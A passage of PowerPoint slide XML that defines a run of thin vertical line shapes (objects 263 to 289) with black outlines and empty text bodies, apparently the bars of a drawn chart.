                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="610766"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="263" name="object 263"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4297241" y="4520928"/>
            <a:ext cx="1258" cy="1211790"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="611505">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="611318"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="264" name="object 264"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4326214" y="4451806"/>
            <a:ext cx="0" cy="1280999"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="646430">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="646194"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="265" name="object 265"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4325940" y="4453693"/>
            <a:ext cx="2517" cy="1279741"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="645794">
                <a:moveTo>
                  <a:pt x="349" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="349" y="645247"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="266" name="object 266"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4354119" y="4374049"/>
            <a:ext cx="0" cy="1359017"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="685800">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="685432"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267" name="object 267"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4351916" y="4371828"/>
            <a:ext cx="2517" cy="1361533"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="687069">
                <a:moveTo>
                  <a:pt x="487" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="487" y="686557"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="268" name="object 268"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4381974" y="4270532"/>
            <a:ext cx="0" cy="1462201"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="737869">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="737675"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="269" name="object 269"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4381701" y="4271874"/>
            <a:ext cx="1258" cy="1460943"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="737235">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="736998"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270" name="object 270"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4409879" y="4139700"/>
            <a:ext cx="0" cy="1593069"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="803910">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="803697"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="271" name="object 271"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4409606" y="4142123"/>
            <a:ext cx="2517" cy="1590553"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="802639">
                <a:moveTo>
                  <a:pt x="622" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="622" y="802474"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272" name="object 272"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4437731" y="4065710"/>
            <a:ext cx="0" cy="1667312"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="841375">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="841030"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273" name="object 273"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4436666" y="4067596"/>
            <a:ext cx="1258" cy="1664795"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="840105">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="840083"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274" name="object 274"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4465090" y="3931102"/>
            <a:ext cx="0" cy="1801953"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="909319">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="908957"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275" name="object 275"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4464816" y="3930521"/>
            <a:ext cx="2517" cy="1801953"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="909319">
                <a:moveTo>
                  <a:pt x="414" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="414" y="909255"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="276" name="object 276"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4492998" y="3771824"/>
            <a:ext cx="0" cy="1960507"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="989330">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="989338"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="277" name="object 277"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4491083" y="3770440"/>
            <a:ext cx="2517" cy="1963024"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="990600">
                <a:moveTo>
                  <a:pt x="414" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="414" y="990036"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278" name="object 278"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4520850" y="3588450"/>
            <a:ext cx="0" cy="2144226"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1082039">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1081868"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="279" name="object 279"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4520577" y="3587571"/>
            <a:ext cx="1258" cy="2145484"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="1082675">
                <a:moveTo>
                  <a:pt x="138" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138" y="1082318"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="280" name="object 280"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4548755" y="3411489"/>
            <a:ext cx="0" cy="2321653"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1171575">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1171168"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="281" name="object 281"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4545760" y="3413377"/>
            <a:ext cx="3775" cy="2319137"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1905" h="1170305">
                <a:moveTo>
                  <a:pt x="687" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="687" y="1170221"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282" name="object 282"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4576663" y="3206633"/>
            <a:ext cx="0" cy="2526764"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1275080">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1274550"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="283" name="object 283"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4575844" y="3209057"/>
            <a:ext cx="1258" cy="2524247"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="1273810">
                <a:moveTo>
                  <a:pt x="138" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138" y="1273327"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284" name="object 284"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4604515" y="3114378"/>
            <a:ext cx="0" cy="2618623"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1321435">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1321105"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285" name="object 285"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4604241" y="3114624"/>
            <a:ext cx="2517" cy="2618623"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="1321435">
                <a:moveTo>
                  <a:pt x="414" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="414" y="1320981"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="286" name="object 286"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4631874" y="2864519"/>
            <a:ext cx="0" cy="2869035"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1447800">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1447186"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="object 287"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4630217" y="2866407"/>
            <a:ext cx="2517" cy="2866518"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="1446530">
                <a:moveTo>
                  <a:pt x="349" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="349" y="1446238"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="288" name="object 288"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4659779" y="2692373"/>
            <a:ext cx="0" cy="3040170"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1534160">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1534055"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="289" name="object 289"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4659507" y="2694520"/>
            <a:ext cx="1258" cy="3038912"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="1533525">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="1532978"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
